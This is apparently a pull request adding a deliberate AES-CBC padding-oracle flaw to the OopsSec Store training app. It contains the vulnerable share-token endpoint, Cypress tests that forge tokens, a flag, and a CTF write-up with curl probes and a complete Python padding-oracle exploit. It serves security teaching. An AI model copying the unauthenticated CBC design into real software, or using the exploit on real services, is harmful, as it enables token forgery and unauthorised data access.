### PR TITLE
vuln: add AES-CBC padding oracle vulnerability (secure document sharing)

### DIFF
--- a/app/api/documents/share/route.ts
+++ b/app/api/documents/share/route.ts
@@ -1,0 +1,110 @@
+import { NextRequest, NextResponse } from "next/server";
+import { prisma } from "@/lib/prisma";
+import { decryptShareToken } from "@/lib/share-crypto";
+
+export async function GET(request: NextRequest) {
+  const { searchParams } = new URL(request.url);
+  const token = searchParams.get("token");
+
+  if (!token || !/^[0-9a-f]+$/i.test(token) || token.length < 64) {
+    return NextResponse.json({ error: "Missing share token" }, { status: 400 });
+  }
+
+  let resourcePath: string;
+  try {
+    resourcePath = decryptShareToken(token);
+  } catch {
+    return NextResponse.json(
+      { error: "Invalid share token format" },
+      { status: 400 }
+    );
+  }
+
+  const colonIndex = resourcePath.indexOf(":");
+  if (colonIndex === -1) {
+    return NextResponse.json(
+      { error: "Shared resource not found" },
+      { status: 404 }
+    );
+  }
+
+  const resourceType = resourcePath.substring(0, colonIndex);
+  const resourceId = resourcePath.substring(colonIndex + 1);
+
+  const supportedTypes = ["order", "report"];
+  if (!supportedTypes.includes(resourceType)) {
+    return NextResponse.json(
+      {
+        error: `Unsupported resource type '${resourceType}'. Expected: ${supportedTypes.join(", ")}`,
+      },
+      { status: 400 }
+    );
+  }
+
+  if (resourceType === "order") {
+    const order = await prisma.order.findUnique({
+      where: { id: resourceId },
+      include: {
+        user: true,
+        items: {
+          include: { product: true },
+        },
+        address: true,
+      },
+    });
+
+    if (!order) {
+      return NextResponse.json(
+        { error: "Shared resource not found" },
+        { status: 404 }
+      );
+    }
+
+    const emailName = order.user.email.split("@")[0];
+    const customerName = emailName.charAt(0).toUpperCase() + emailName.slice(1);
+
+    return NextResponse.json({
+      type: "order",
+      order: {
+        id: order.id,
+        total: order.total,
+        status: order.status,
+        customerName,
+        createdAt: order.createdAt,
+        items: order.items.map((item) => ({
+          name: item.product.name,
+          quantity: item.quantity,
+          price: item.priceAtPurchase,
+        })),
+        deliveryAddress: {
+          street: order.address.street,
+          city: order.address.city,
+          state: order.address.state,
+          zipCode: order.address.zipCode,
+          country: order.address.country,
+        },
+      },
+    });
+  }
+
+  if (resourceType === "report") {
+    if (resourceId === "internal") {
+      const flag = await prisma.flag.findUnique({
+        where: { slug: "aes-cbc-padding-oracle" },
+      });
+
+      return NextResponse.json({
+        type: "report",
+        title: "Internal Security Audit Report",
+        content:
+          "Quarterly security assessment completed. All systems operational. No critical findings.",
+        flag: flag?.flag,
+      });
+    }
+  }
+
+  return NextResponse.json(
+    { error: "Shared resource not found" },
+    { status: 404 }
+  );
+}

--- a/app/api/orders/[id]/share/route.ts
+++ b/app/api/orders/[id]/share/route.ts
@@ -1,0 +1,41 @@
+import { NextRequest, NextResponse } from "next/server";
+import { prisma } from "@/lib/prisma";
+import { getAuthenticatedUser } from "@/lib/server-auth";
+import { encryptShareToken } from "@/lib/share-crypto";
+
+export async function POST(
+  request: NextRequest,
+  { params }: { params: Promise<{ id: string }> }
+) {
+  try {
+    const user = await getAuthenticatedUser(request);
+
+    if (!user) {
+      return NextResponse.json({ error: "Unauthorized" }, { status: 401 });
+    }
+
+    const { id } = await params;
+
+    const order = await prisma.order.findUnique({
+      where: { id, userId: user.id },
+    });
+
+    if (!order) {
+      return NextResponse.json({ error: "Order not found" }, { status: 404 });
+    }
+
+    const token = encryptShareToken(`order:${id}`);
+
+    const protocol = request.headers.get("x-forwarded-proto") || "http";
+    const host = request.headers.get("host") || "localhost:3000";
+    const shareUrl = `${protocol}://${host}/api/documents/share?token=${token}`;
+
+    return NextResponse.json({ shareUrl, token });
+  } catch (error) {
+    console.error("Error generating share link:", error);
+    return NextResponse.json(
+      { error: "Failed to generate share link" },
+      { status: 500 }
+    );
+  }
+}

--- a/app/order/OrderClient.tsx
+++ b/app/order/OrderClient.tsx
@@ -4,6 +4,7 @@ import { useState, useEffect } from "react";
 import { useRouter, useSearchParams } from "next/navigation";
 import Link from "next/link";
 import FlagDisplay from "../components/FlagDisplay";
+import ShareOrderButton from "./ShareOrderButton";
 import { api, ApiError } from "@/lib/api";
 import { getStoredUser } from "@/lib/client-auth";
 import type { Order } from "@/lib/types";
@@ -198,6 +199,7 @@ export default function OrderClient() {
             >
               View Cart
             </Link>
+            {orderId && <ShareOrderButton orderId={orderId} />}
           </div>
         </div>
       </div>

--- a/app/order/ShareOrderButton.tsx
+++ b/app/order/ShareOrderButton.tsx
@@ -1,0 +1,95 @@
+"use client";
+
+import { useState } from "react";
+import { api, ApiError } from "@/lib/api";
+
+interface ShareResponse {
+  shareUrl: string;
+  token: string;
+}
+
+export default function ShareOrderButton({ orderId }: { orderId: string }) {
+  const [shareUrl, setShareUrl] = useState<string | null>(null);
+  const [isLoading, setIsLoading] = useState(false);
+  const [error, setError] = useState("");
+  const [copied, setCopied] = useState(false);
+
+  const handleShare = async () => {
+    setError("");
+    setIsLoading(true);
+    try {
+      const data = await api.post<ShareResponse>(
+        `/api/orders/${orderId}/share`
+      );
+      setShareUrl(data.shareUrl);
+    } catch (err) {
+      const message =
+        err instanceof ApiError ? err.message : "Failed to generate share link";
+      setError(message);
+    } finally {
+      setIsLoading(false);
+    }
+  };
+
+  const handleCopy = async () => {
+    if (!shareUrl) return;
+    try {
+      await navigator.clipboard.writeText(shareUrl);
+      setCopied(true);
+      setTimeout(() => setCopied(false), 2000);
+    } catch {
+      setError("Failed to copy to clipboard");
+    }
+  };
+
+  return (
+    <div className="w-full sm:w-auto">
+      {!shareUrl ? (
+        <button
+          onClick={handleShare}
+          disabled={isLoading}
+          className="flex w-full cursor-pointer items-center justify-center gap-2 rounded-xl border-2 border-slate-300 bg-white px-6 py-3 font-semibold text-slate-700 transition-all hover:bg-slate-50 disabled:opacity-50 dark:border-slate-600 dark:bg-slate-800 dark:text-slate-300 dark:hover:bg-slate-700"
+        >
+          <svg
+            className="h-5 w-5"
+            fill="none"
+            stroke="currentColor"
+            viewBox="0 0 24 24"
+          >
+            <path
+              strokeLinecap="round"
+              strokeLinejoin="round"
+              strokeWidth={2}
+              d="M8.684 13.342C8.886 12.938 9 12.482 9 12c0-.482-.114-.938-.316-1.342m0 2.684a3 3 0 110-2.684m0 2.684l6.632 3.316m-6.632-6l6.632-3.316m0 0a3 3 0 105.367-2.684 3 3 0 00-5.367 2.684zm0 9.316a3 3 0 105.368 2.684 3 3 0 00-5.368-2.684z"
+            />
+          </svg>
+          {isLoading ? "Generating..." : "Share Order"}
+        </button>
+      ) : (
+        <div className="w-full space-y-2">
+          <div className="flex items-center gap-2">
+            <input
+              data-share-url
+              type="text"
+              readOnly
+              value={shareUrl}
+              className="block w-full min-w-0 rounded-lg border border-slate-300 bg-slate-50 px-3 py-2 text-sm text-slate-700 dark:border-slate-600 dark:bg-slate-800 dark:text-slate-300"
+            />
+            <button
+              onClick={handleCopy}
+              className="shrink-0 cursor-pointer rounded-lg border border-slate-300 bg-white px-3 py-2 text-sm font-medium text-slate-700 transition-all hover:bg-slate-50 dark:border-slate-600 dark:bg-slate-700 dark:text-slate-300 dark:hover:bg-slate-600"
+            >
+              {copied ? "Copied!" : "Copy"}
+            </button>
+          </div>
+          <p className="text-xs text-slate-500 dark:text-slate-400">
+            Anyone with this link can view the order details.
+          </p>
+        </div>
+      )}
+      {error && (
+        <p className="mt-2 text-sm text-red-600 dark:text-red-400">{error}</p>
+      )}
+    </div>
+  );
+}

--- a/content/vulnerabilities/aes-cbc-padding-oracle.md
+++ b/content/vulnerabilities/aes-cbc-padding-oracle.md
@@ -1,0 +1,178 @@
+# AES-CBC Padding Oracle Vulnerability
+
+## Overview
+
+This vulnerability demonstrates a padding oracle attack against AES-CBC encrypted share tokens. The application encrypts resource identifiers using AES-256-CBC to generate shareable document links, but fails to authenticate the ciphertext with an HMAC. Combined with distinguishable error responses for padding failures versus resource-not-found conditions, this creates a classic padding oracle that allows attackers to decrypt tokens and forge new ones pointing to arbitrary internal resources.
+
+The padding oracle attack was first described by Serge Vaudenay in 2002 and has since affected many real-world systems including ASP.NET, Ruby on Rails, and various banking applications.
+
+## Vulnerability Summary
+
+The document sharing system encrypts resource paths (e.g., `order:ORD-001`) using AES-256-CBC and serves them via a public share endpoint. When the endpoint receives a token, it attempts to decrypt it and then resolves the referenced resource. The problem is that the server returns different HTTP status codes depending on the failure mode:
+
+1. **400 Bad Request** — When PKCS#7 padding validation fails during AES-CBC decryption
+2. **404 Not Found** — When padding is valid but the decrypted resource path doesn't match any known resource
+3. **200 OK** — When padding is valid and the resource exists
+
+This three-way distinction leaks a single bit of information per request: whether the padding was valid or not. That single bit is enough to decrypt any ciphertext and forge new ones.
+
+### Vulnerable Code
+
+The encryption utility uses AES-256-CBC without any integrity check:
+
+```typescript
+import crypto from "crypto";
+
+const ALGORITHM = "aes-256-cbc";
+
+export function encryptShareToken(plaintext: string): string {
+  const iv = crypto.randomBytes(16);
+  const cipher = crypto.createCipheriv(ALGORITHM, SHARE_KEY, iv);
+  const encrypted = Buffer.concat([
+    cipher.update(plaintext, "utf8"),
+    cipher.final(),
+  ]);
+  return Buffer.concat([iv, encrypted]).toString("hex");
+}
+
+export function decryptShareToken(tokenHex: string): string {
+  const data = Buffer.from(tokenHex, "hex");
+  const iv = data.subarray(0, 16);
+  const ciphertext = data.subarray(16);
+  const decipher = crypto.createDecipheriv(ALGORITHM, SHARE_KEY, iv);
+  return Buffer.concat([
+    decipher.update(ciphertext),
+    decipher.final(),
+  ]).toString("utf8");
+  // No HMAC verification — ciphertext integrity is not checked
+}
+```
+
+The share endpoint catches the decryption error separately from the resource lookup:
+
+```typescript
+let resourcePath: string;
+try {
+  resourcePath = decryptShareToken(token);
+} catch {
+  // Padding error → 400
+  return NextResponse.json(
+    { error: "Invalid share token format" },
+    { status: 400 }
+  );
+}
+
+// If we get here, padding was valid
+// ... lookup resource ...
+return NextResponse.json(
+  { error: "Shared resource not found" },
+  { status: 404 }
+);
+```
+
+## Impact
+
+An attacker who can observe the server's responses can:
+
+- **Decrypt any share token** to learn the plaintext resource path format
+- **Forge tokens for arbitrary resources**, including internal reports not meant to be shared
+- **Access confidential data** without authentication, bypassing the intended access control
+- **Enumerate internal resource types** by forging tokens for different paths
+
+## Exploitation
+
+### How AES-CBC and PKCS#7 Padding Work
+
+AES-CBC encrypts data in 16-byte blocks. Each plaintext block is XORed with the previous ciphertext block (or the IV for the first block) before encryption. During decryption, the process is reversed: each ciphertext block is decrypted, then XORed with the previous ciphertext block to recover the plaintext.
+
+PKCS#7 padding fills the last block to exactly 16 bytes. If 3 bytes of padding are needed, the padding is `\x03\x03\x03`. If 1 byte is needed, it's `\x01`. A full block of padding (`\x10` repeated 16 times) is added when the plaintext is already a multiple of 16.
+
+The server validates this padding during decryption. If the padding bytes don't follow the PKCS#7 pattern, `decipher.final()` throws an error. The attacker can detect this because the server returns 400 instead of 404.
+
+### The Attack
+
+For a single-block ciphertext (token = IV + 1 cipher block), the attacker:
+
+1. Keeps the cipher block unchanged and modifies the IV
+2. For each byte position (from byte 15 down to byte 0), brute-forces all 256 possible values
+3. When the server returns non-400 (meaning valid padding), the attacker learns the intermediate decryption value for that byte
+4. After recovering all 16 intermediate bytes, computes a new IV that produces any desired plaintext
+
+### How to Retrieve the Flag
+
+To retrieve the flag `OSS{p4dd1ng_0r4cl3_f0rg3d_t0k3n}`:
+
+**Step 1:** Log in and place an order. On the order confirmation page, click "Share Order" to generate a share token.
+
+**Step 2:** Visit the share URL to confirm it works (200 response with order data).
+
+**Step 3:** Modify a byte in the token and observe the response. You should see either 400 (bad padding) or 404 (valid padding, unknown resource).
+
+**Step 4:** Once you can forge arbitrary plaintexts, try an unknown resource type. The server responds with an error message listing the supported types (`order`, `report`), revealing the `report` type.
+
+**Step 5:** Use a padding oracle script to recover the 16 intermediate bytes of the cipher block. This requires up to 4096 requests.
+
+**Step 6:** Compute a new IV so the block decrypts to `report:internal` (with PKCS#7 padding: `report:internal\x01`):
+
+```
+new_iv[i] = intermediate[i] XOR target_plaintext_with_padding[i]
+```
+
+**Step 7:** Send the forged token (new IV + original cipher block) to the share endpoint. The server decrypts it to `report:internal` and returns the flag.
+
+### Code Fixes
+
+**Before (Vulnerable) — Encrypt-only with distinguishable errors:**
+
+```typescript
+try {
+  resourcePath = decryptShareToken(token);
+} catch {
+  return NextResponse.json(
+    { error: "Invalid share token format" },
+    { status: 400 }
+  );
+}
+// ... resource lookup returns 404 ...
+```
+
+**After (Secure) — Use AES-GCM (authenticated encryption):**
+
+```typescript
+import crypto from "crypto";
+
+export function encryptShareToken(plaintext: string): string {
+  const iv = crypto.randomBytes(12); // GCM uses 12-byte nonces
+  const cipher = crypto.createCipheriv("aes-256-gcm", KEY, iv);
+  const encrypted = Buffer.concat([
+    cipher.update(plaintext, "utf8"),
+    cipher.final(),
+  ]);
+  const authTag = cipher.getAuthTag();
+  return Buffer.concat([iv, authTag, encrypted]).toString("hex");
+}
+
+export function decryptShareToken(tokenHex: string): string {
+  const data = Buffer.from(tokenHex, "hex");
+  const iv = data.subarray(0, 12);
+  const authTag = data.subarray(12, 28);
+  const ciphertext = data.subarray(28);
+  const decipher = crypto.createDecipheriv("aes-256-gcm", KEY, iv);
+  decipher.setAuthTag(authTag);
+  return Buffer.concat([
+    decipher.update(ciphertext),
+    decipher.final(),
+  ]).toString("utf8");
+}
+```
+
+Alternatively, use Encrypt-then-HMAC: compute `HMAC-SHA256(IV + ciphertext)` after encryption and verify it before decryption. If the HMAC doesn't match, reject the token with a generic error before any decryption occurs.
+
+In both cases, return the same error (e.g., 400) regardless of whether the failure was in authentication, padding, or resource lookup.
+
+## References
+
+- [CWE-649: Reliance on Obfuscation or Protection Mechanism that is Not Trusted](https://cwe.mitre.org/data/definitions/649.html)
+- [OWASP — Testing for Padding Oracle](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/02-Testing_for_Padding_Oracle)
+- [OWASP Top 10 — A02:2021 Cryptographic Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures/)
+- [Microsoft — Timing vulnerabilities with CBC-mode symmetric decryption using padding](https://learn.microsoft.com/en-us/dotnet/standard/security/vulnerabilities-cbc-mode)

--- a/cypress/e2e/aes-cbc-padding-oracle.cy.ts
+++ b/cypress/e2e/aes-cbc-padding-oracle.cy.ts
@@ -1,0 +1,144 @@
+describe("AES-CBC Padding Oracle (E2E)", () => {
+  it("order page shows Share Order button and generates a share link", () => {
+    cy.loginAsBob();
+    cy.visit("/order?id=ORD-001");
+
+    cy.contains("button", "Share Order").should("be.visible").click();
+
+    cy.get("input[data-share-url]", { timeout: 10000 })
+      .should("be.visible")
+      .invoke("val")
+      .should("contain", "/api/documents/share?token=");
+
+    cy.contains("Anyone with this link can view the order details.").should(
+      "be.visible"
+    );
+  });
+
+  it("share link returns order data without authentication", () => {
+    cy.request({
+      method: "POST",
+      url: "/api/auth/login",
+      body: { email: "bob@example.com", password: "qwerty" },
+    });
+
+    cy.request("POST", "/api/orders/ORD-001/share").then((response) => {
+      expect(response.status).to.eq(200);
+      const { token } = response.body;
+
+      cy.clearCookies();
+
+      cy.request("GET", `/api/documents/share?token=${token}`).then(
+        (shareResponse) => {
+          expect(shareResponse.status).to.eq(200);
+          expect(shareResponse.body.type).to.eq("order");
+          expect(shareResponse.body.order.id).to.eq("ORD-001");
+        }
+      );
+    });
+  });
+
+  it("tampered ciphertext returns 400 (padding oracle signal)", () => {
+    cy.request({
+      method: "POST",
+      url: "/api/auth/login",
+      body: { email: "bob@example.com", password: "qwerty" },
+    });
+
+    cy.request("POST", "/api/orders/ORD-001/share").then((response) => {
+      const { token } = response.body;
+
+      // Flip last byte of ciphertext
+      const bytes = Cypress.Buffer.from(token, "hex");
+      bytes[bytes.length - 1] ^= 0x01;
+      const tampered = bytes.toString("hex");
+
+      cy.request({
+        url: `/api/documents/share?token=${tampered}`,
+        failOnStatusCode: false,
+      }).then((res) => {
+        expect(res.status).to.eq(400);
+        expect(res.body.error).to.eq("Invalid share token format");
+      });
+    });
+  });
+
+  it("unknown resource type leaks supported types", () => {
+    cy.request({
+      method: "POST",
+      url: "/api/auth/login",
+      body: { email: "bob@example.com", password: "qwerty" },
+    });
+
+    cy.request("POST", "/api/orders/ORD-001/share").then((response) => {
+      const { token } = response.body;
+      const bytes = Cypress.Buffer.from(token, "hex");
+      const iv = bytes.subarray(0, 16);
+      const cipherBlock = bytes.subarray(16, 32);
+
+      const knownPlaintext = Cypress.Buffer.from("order:ORD-001\x03\x03\x03");
+      const intermediate = Cypress.Buffer.alloc(16);
+      for (let i = 0; i < 16; i++) {
+        intermediate[i] = iv[i] ^ knownPlaintext[i];
+      }
+
+      const target = Cypress.Buffer.from("zzzzz:test\x06\x06\x06\x06\x06\x06");
+      const newIv = Cypress.Buffer.alloc(16);
+      for (let i = 0; i < 16; i++) {
+        newIv[i] = intermediate[i] ^ target[i];
+      }
+      const forged = Cypress.Buffer.concat([newIv, cipherBlock]).toString(
+        "hex"
+      );
+
+      cy.request({
+        url: `/api/documents/share?token=${forged}`,
+        failOnStatusCode: false,
+      }).then((res) => {
+        expect(res.status).to.eq(400);
+        expect(res.body.error).to.contain("Unsupported resource type");
+        expect(res.body.error).to.contain("report");
+      });
+    });
+  });
+
+  it("forged token for report:internal returns flag", () => {
+    cy.request({
+      method: "POST",
+      url: "/api/auth/login",
+      body: { email: "bob@example.com", password: "qwerty" },
+    });
+
+    cy.request("POST", "/api/orders/ORD-001/share").then((response) => {
+      const { token } = response.body;
+      const bytes = Cypress.Buffer.from(token, "hex");
+      const iv = bytes.subarray(0, 16);
+      const cipherBlock = bytes.subarray(16, 32);
+
+      const knownPlaintext = Cypress.Buffer.from("order:ORD-001\x03\x03\x03");
+      const intermediate = Cypress.Buffer.alloc(16);
+      for (let i = 0; i < 16; i++) {
+        intermediate[i] = iv[i] ^ knownPlaintext[i];
+      }
+
+      const target = Cypress.Buffer.from("report:internal\x01");
+      const newIv = Cypress.Buffer.alloc(16);
+      for (let i = 0; i < 16; i++) {
+        newIv[i] = intermediate[i] ^ target[i];
+      }
+      const forged = Cypress.Buffer.concat([newIv, cipherBlock]).toString(
+        "hex"
+      );
+
+      cy.request(`/api/documents/share?token=${forged}`).then((res) => {
+        expect(res.status).to.eq(200);
+        expect(res.body.type).to.eq("report");
+        expect(res.body.flag)
+          .to.be.a("string")
+          .and.match(/^OSS\{/);
+
+        cy.verifyFlag(res.body.flag);
+      });
+    });
+  });
+});

--- a/docs/src/data/blog/aes-cbc-padding-oracle-forged-share-token.md
+++ b/docs/src/data/blog/aes-cbc-padding-oracle-forged-share-token.md
@@ -1,0 +1,437 @@
+---
+author: kOaDT
+authorGithubUrl: https://github.com/kOaDT
+authorGithubAvatar: https://avatars.githubusercontent.com/u/17499022?v=4
+pubDatetime: 2026-03-13T10:00:00Z
+title: "Padding oracle attack: forging encrypted share tokens"
+slug: aes-cbc-padding-oracle-forged-share-token
+draft: false
+tags:
+  - writeup
+  - cryptographic
+  - padding-oracle
+  - aes-cbc
+  - ctf
+description: A padding oracle in OopsSec Store's share feature leaks whether decryption produced valid PKCS#7 padding. That's enough to forge a token for an internal report and grab the flag.
+---
+
+OopsSec Store has a "Share Order" button that generates encrypted links. No login needed to open them. The tokens use AES-256-CBC, but nobody bothered adding an HMAC or using authenticated encryption. Worse, the server returns different status codes for "bad padding" and "resource not found". That's a textbook padding oracle, and we can abuse it to forge a token that decrypts to whatever plaintext we want.
+
+## Table of contents
+
+## Lab setup
+
+From an empty directory:
+
+```bash
+npx create-oss-store oss-store
+cd oss-store
+npm start
+```
+
+Or with Docker (no Node.js required):
+
+```bash
+docker run -p 3000:3000 leogra/oss-oopssec-store
+```
+
+The app runs at `http://localhost:3000`.
+
+## Target identification
+
+After placing an order, the confirmation page shows a "Share Order" button. Clicking it generates a share URL:
+
+```
+http://localhost:3000/api/documents/share?token=a1b2c3d4...
+```
+
+The token is a hex string. Visit the URL and you get order details as JSON, no authentication required. It's 64 hex characters long, so 32 bytes: 16 bytes IV + 16 bytes ciphertext. A single AES block.
+
+## Discovery: finding the oracle
+
+Grab a valid token and start poking at it. Generate a share link from an order page, then extract the token.
+
+### Confirming the token works
+
+```bash
+TOKEN="<your-token-here>"
+curl -s "http://localhost:3000/api/documents/share?token=$TOKEN"
+```
+
+Response (200):
+
+```json
+{
+  "type": "order",
+  "order": {
+    "id": "ORD-004",
+    "total": 12.99,
+    "status": "PENDING",
+    ...
+  }
+}
+```
+
+### Flipping a byte in the ciphertext
+
+Modify one hex character near the end of the token (in the ciphertext portion, bytes 17-32):
+
+```bash
+# Change the last hex digit
+MODIFIED="${TOKEN:0:63}0"
+curl -s -o /dev/null -w "%{http_code}" "http://localhost:3000/api/documents/share?token=$MODIFIED"
+```
+
+Response: **400** — `{"error": "Invalid share token format"}`
+
+Decryption failed. Bad padding.
+
+### Flipping a byte in the IV
+
+Now modify a hex character in the first 32 characters (the IV):
+
+```bash
+# Change the first hex digit
+MODIFIED="0${TOKEN:1}"
+curl -s -o /dev/null -w "%{http_code}" "http://localhost:3000/api/documents/share?token=$MODIFIED"
+```
+
+Response: **404** — `{"error": "Shared resource not found"}`
+
+Changing the IV doesn't break padding (padding depends on the ciphertext block), but it corrupts the decrypted plaintext. So the server got valid padding, tried to look up the garbled resource path, found nothing, and returned 404.
+
+There's our oracle: **400 = bad padding, 404 = valid padding**.
+
+## Understanding the vulnerability
+
+### AES-CBC decryption
+
+For a single-block ciphertext:
+
+```
+Plaintext = Decrypt(Key, CiphertextBlock) XOR IV
+```
+
+Decrypting the cipher block gives an "intermediate value". XOR that with the IV and you get the plaintext. The thing is, if we figure out the intermediate value, we can pick an IV that XORs it into whatever plaintext we want.
+
+### PKCS#7 padding
+
+The last block must have valid PKCS#7 padding. For a 13-byte plaintext like `order:ORD-001`:
+
+```
+o  r  d  e  r  :  O  R  D  -  0  0  1  03 03 03
+```
+
+The last 3 bytes are `\x03\x03\x03` (3 bytes of padding, each with value 3).
+
+For a 15-byte plaintext like `report:internal`:
+
+```
+r  e  p  o  r  t  :  i  n  t  e  r  n  a  l  01
+```
+
+Just one byte of padding: `\x01`.
+
+### The attack step by step
+
+To recover `intermediate[15]` (the last intermediate byte):
+
+1. Set a test IV where bytes 0-14 are anything and byte 15 is our guess `g`
+2. Send `testIV + originalCipherBlock` to the server
+3. The server computes `plaintext[15] = intermediate[15] XOR g`
+4. If `plaintext[15] == 0x01`, padding is valid and the server returns 404 instead of 400
+5. When we find the right `g`: `intermediate[15] = g XOR 0x01`
+
+For byte 14, we want 2-byte padding (`\x02\x02`):
+
+1. Set `testIV[15] = intermediate[15] XOR 0x02` (forces last byte to `\x02`)
+2. Brute-force `testIV[14]` from 0 to 255
+3. When padding is valid: `intermediate[14] = g XOR 0x02`
+
+Repeat for all 16 bytes. Worst case: 256 x 16 = 4,096 requests for one block.
+
+### Handling false positives
+
+When attacking the last byte, a guess might produce valid padding like `\x02\x02` (if the second-to-last decrypted byte happens to be `\x02`) instead of the `\x01` we're looking for. Easy to check:
+
+1. Flip byte 14 of the test IV
+2. If the server now returns 400, the original result was a false positive (the padding was `\x02\x02`, not `\x01`)
+3. Skip this guess and move on
+
+## Exploitation
+
+### Step 1: Generate a valid share token
+
+Log in (e.g., as `alice@example.com` / `iloveduck`), place an order, and click "Share Order" on the confirmation page. Copy the token from the generated URL.
+
+```bash
+TOKEN="<your-64-char-hex-token>"
+```
+
+### Step 2: Confirm the oracle
+
+```bash
+# Original token — should return 200
+curl -s -o /dev/null -w "%{http_code}" "http://localhost:3000/api/documents/share?token=$TOKEN"
+
+# Flip last ciphertext byte — should return 400 (bad padding)
+FLIP_CT="${TOKEN:0:63}$(printf '%x' $(( (0x${TOKEN:63:1} + 1) % 16 )))"
+curl -s -o /dev/null -w "%{http_code}" "http://localhost:3000/api/documents/share?token=$FLIP_CT"
+
+# Flip first IV byte — should return 404 (valid padding, wrong resource)
+FLIP_IV="$(printf '%x' $(( (0x${TOKEN:0:1} + 1) % 16 )))${TOKEN:1}"
+curl -s -o /dev/null -w "%{http_code}" "http://localhost:3000/api/documents/share?token=$FLIP_IV"
+```
+
+### Step 3: Discover the target resource
+
+Once you can decrypt your own token, you'll see the format is `order:<id>`. But what other resource types exist?
+
+Forge a token with a garbage type (e.g., `aaaa:test`) and the server tells you:
+
+```json
+{
+  "error": "Unsupported resource type 'aaaa'. Expected: order, report"
+}
+```
+
+So `report` is a valid type. Try common identifiers: `report:internal`, `report:admin`, `report:secret`... The target is `report:internal`.
+
+### Step 4: Run the padding oracle attack
+
+Here's the full Python exploit:
+
+```python
+#!/usr/bin/env python3
+"""Padding oracle exploit for OopsSec Store share tokens."""
+
+import requests
+import sys
+
+BASE_URL = "http://localhost:3000"
+BLOCK_SIZE = 16
+
+
+def has_valid_padding(token_hex: str) -> bool:
+    """Returns True if the server indicates valid padding (non-400 response)."""
+    r = requests.get(f"{BASE_URL}/api/documents/share", params={"token": token_hex})
+    return r.status_code != 400
+
+
+def recover_intermediate(cipher_block: bytes) -> bytearray:
+    """Recover the intermediate state of a cipher block using the padding oracle."""
+    intermediate = bytearray(BLOCK_SIZE)
+
+    for byte_pos in range(BLOCK_SIZE - 1, -1, -1):
+        padding_value = BLOCK_SIZE - byte_pos
+
+        # Build test IV with known intermediate bytes set for target padding
+        test_iv = bytearray(BLOCK_SIZE)
+        for k in range(byte_pos + 1, BLOCK_SIZE):
+            test_iv[k] = intermediate[k] ^ padding_value
+
+        found = False
+        for guess in range(256):
+            test_iv[byte_pos] = guess
+            token_hex = (bytes(test_iv) + cipher_block).hex()
+
+            if has_valid_padding(token_hex):
+                # Verify to avoid false positives on the last byte
+                if byte_pos == BLOCK_SIZE - 1 and padding_value == 1:
+                    verify_iv = bytearray(test_iv)
+                    verify_iv[byte_pos - 1] ^= 1
+                    verify_token = (bytes(verify_iv) + cipher_block).hex()
+                    if not has_valid_padding(verify_token):
+                        continue
+
+                intermediate[byte_pos] = guess ^ padding_value
+                plaintext_byte = intermediate[byte_pos] ^ 0  # XOR with 0 (test IV)
+                print(
+                    f"  [+] Byte {byte_pos:2d}: "
+                    f"intermediate=0x{intermediate[byte_pos]:02x} "
+                    f"(guess=0x{guess:02x}, padding=0x{padding_value:02x})"
+                )
+                found = True
+                break
+
+        if not found:
+            print(f"  [-] Failed to find byte {byte_pos}")
+            sys.exit(1)
+
+    return intermediate
+
+
+def forge_token(intermediate: bytearray, target: str, cipher_block: bytes) -> str:
+    """Forge a new IV so the cipher block decrypts to the target plaintext."""
+    target_bytes = target.encode("utf-8")
+    pad_len = BLOCK_SIZE - len(target_bytes)
+    if pad_len <= 0:
+        print(f"[-] Target '{target}' must be shorter than {BLOCK_SIZE} bytes")
+        sys.exit(1)
+
+    padded = target_bytes + bytes([pad_len] * pad_len)
+    new_iv = bytearray(BLOCK_SIZE)
+    for i in range(BLOCK_SIZE):
+        new_iv[i] = intermediate[i] ^ padded[i]
+
+    return (bytes(new_iv) + cipher_block).hex()
+
+
+def main():
+    if len(sys.argv) < 2:
+        print(f"Usage: {sys.argv[0]} <share-token-hex>")
+        print("  Get a token by clicking 'Share Order' on an order page")
+        sys.exit(1)
+
+    token_hex = sys.argv[1]
+    token_bytes = bytes.fromhex(token_hex)
+
+    if len(token_bytes) < 32:
+        print("[-] Token too short. Expected at least 32 bytes (IV + 1 block)")
+        sys.exit(1)
+
+    iv = token_bytes[:16]
+    cipher_block = token_bytes[16:32]
+
+    print(f"[*] Token: {token_hex}")
+    print(f"[*] IV:    {iv.hex()}")
+    print(f"[*] Block: {cipher_block.hex()}")
+    print()
+
+    # Step 1: Recover intermediate state
+    print("[*] Recovering intermediate state using padding oracle...")
+    intermediate = recover_intermediate(cipher_block)
+    print(f"\n[+] Intermediate: {intermediate.hex()}")
+
+    # Verify by recovering the original plaintext
+    original_plaintext = bytearray(BLOCK_SIZE)
+    for i in range(BLOCK_SIZE):
+        original_plaintext[i] = intermediate[i] ^ iv[i]
+    print(f"[+] Original plaintext (raw): {bytes(original_plaintext)}")
+    print()
+
+    # Step 2: Forge token for 'report:internal'
+    target = "report:internal"
+    print(f"[*] Forging token for '{target}'...")
+    forged_token = forge_token(intermediate, target, cipher_block)
+    print(f"[+] Forged token: {forged_token}")
+    print()
+
+    # Step 3: Retrieve the flag
+    print("[*] Sending forged token...")
+    r = requests.get(
+        f"{BASE_URL}/api/documents/share", params={"token": forged_token}
+    )
+    print(f"[*] Status: {r.status_code}")
+    data = r.json()
+    print(f"[*] Response: {data}")
+
+    if "flag" in data:
+        print(f"\n[+] FLAG: {data['flag']}")
+    else:
+        print("\n[-] No flag in response. Something went wrong.")
+
+
+if __name__ == "__main__":
+    main()
+```
+
+### Step 5: Run the exploit
+
+```bash
+python3 exploit.py <your-token-hex>
+```
+
+The script parses the token into IV and cipher block, brute-forces each byte of the intermediate state (up to 4,096 requests, a few seconds), forges a new IV so the block decrypts to `report:internal`, and sends the forged token.
+
+> **Note:** If you already know the plaintext (e.g., `order:ORD-001`), you can compute the intermediate state directly as `intermediate[i] = iv[i] XOR plaintext_with_padding[i]` — no oracle queries needed. That's a useful shortcut for testing, but the real attack doesn't assume known plaintext: it recovers the intermediate state one byte at a time by brute-forcing each IV byte and observing the server's response (400 vs non-400).
+
+### Step 6: Get the flag
+
+The forged token decrypts to `report:internal`, and the share endpoint serves it up:
+
+```json
+{
+  "type": "report",
+  "title": "Internal Security Audit Report",
+  "content": "Quarterly security assessment completed. All systems operational. No critical findings.",
+  "flag": "OSS{p4dd1ng_0r4cl3_f0rg3d_t0k3n}"
+}
+```
+
+## Vulnerable code analysis
+
+Two things make this work.
+
+First, no ciphertext authentication. Encrypt-only, no HMAC:
+
